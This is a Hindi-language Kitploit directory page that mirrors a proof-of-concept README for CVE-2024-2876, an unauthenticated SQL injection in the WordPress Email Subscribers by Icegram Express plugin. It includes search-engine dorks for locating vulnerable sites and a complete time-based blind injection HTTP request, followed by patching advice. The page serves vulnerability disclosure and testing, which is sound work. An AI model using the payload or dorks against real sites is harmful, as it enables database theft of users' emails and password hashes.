Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2876 — वर्डप्रेस ईमेल सब्सक्राइबर्स प्लगइन में एक गंभीर SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें शोषण विवरण, HTTP अनुरोध और सर्च डॉर्क्स शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/kernel364/cve-2024-2876
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubkernel364/cve-2024-2876

CVE-2024-2876

वर्डप्रेस ईमेल सब्सक्राइबर्स प्लगइन में एक गंभीर SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें शोषण विवरण, HTTP अनुरोध और सर्च डॉर्क्स शामिल हैं।

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2876 - ईमेल सब्सक्राइबर्स बाय आइसग्राम एक्सप्रेस में SQL इंजेक्शन कमजोरी

अवलोकन

CVE-2024-2876 वर्डप्रेस के लिए "Email Subscribers by Icegram Express" प्लगइन में पाई गई एक गंभीर सुरक्षा कमजोरी है। यह कमजोरी संस्करण 5.7.14 तक और सहित को प्रभावित करती है और 90,000 से अधिक वेबसाइटों के लिए महत्वपूर्ण जोखिम पैदा करती है।

कमजोरी का विवरण

  • CVE-ID: CVE-2024-2876
  • CVSS स्कोर: 9.8 (गंभीर)
  • प्रभावित संस्करण: 5.7.14 तक
  • पैच किया गया संस्करण: 5.7.15 और उससे ऊपर

विवरण

यह कमजोरी एक SQL इंजेक्शन दोष है जो अप्रमाणित हमलावरों को प्रभावित वर्डप्रेस डेटाबेस पर दुर्भावनापूर्ण SQL क्वेरी निष्पादित करने की अनुमति देती है। उपयोगकर्ता इनपुट में हेरफेर करके जो ठीक से सैनिटाइज़ नहीं किए गए हैं, हमलावर उपयोगकर्ता नाम, ईमेल पते, पासवर्ड हैश और सब्सक्राइबर सूचियों जैसी संवेदनशील जानकारी निकाल सकते हैं।

शोषण तंत्र

SQL इंजेक्शन प्लगइन के IG_ES_Subscribers_Query वर्ग के run फ़ंक्शन में होता है, जहाँ अपर्याप्त इनपुट सत्यापन अनधिकृत SQL कोड निष्पादन की ओर ले जाता है। यह वर्डप्रेस डेटाबेस में संग्रहीत डेटा की अखंडता और गोपनीयता से समझौता करता है।

डॉर्क्स CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

सिफारिशें

  1. तत्काल अपडेट: यदि आप "Email Subscribers by Icegram Express" प्लगइन का उपयोग कर रहे हैं, तो सुरक्षा सुधार लागू करने के लिए तुरंत संस्करण 5.7.15 या बाद में अपग्रेड करें।

  2. नियमित ऑडिट: सुरक्षा सुनिश्चित करने के लिए सभी वर्डप्रेस प्लगइन्स और थीम्स को नियमित रूप से उनके नवीनतम संस्करणों में समीक्षा और अपडेट करें।

  3. सुरक्षा प्लगइन्स: SQL इंजेक्शन और अन्य साइबर खतरों के खिलाफ बचाव को बढ़ाने के लिए प्रतिष्ठित वर्डप्रेस सुरक्षा प्लगइन्स का उपयोग करें।

  4. मजबूत पासवर्ड नीतियां: अनधिकृत पहुंच जोखिम को कम करने के लिए अपनी वर्डप्रेस साइट से संबंधित सभी खातों के लिए मजबूत और अद्वितीय पासवर्ड लागू करें।

गैर-अनुपालन का प्रभाव

प्रभावित प्लगइन को अपडेट करने में विफलता वेबसाइटों को डेटा उल्लंघन और अनधिकृत पहुंच के प्रति संवेदनशील छोड़ सकती है। इस प्लगइन के व्यापक उपयोग को देखते हुए, इंस्टॉलेशन को सुरक्षित करने के लिए तत्काल कार्रवाई महत्वपूर्ण है।

टूल डाउनलोड करें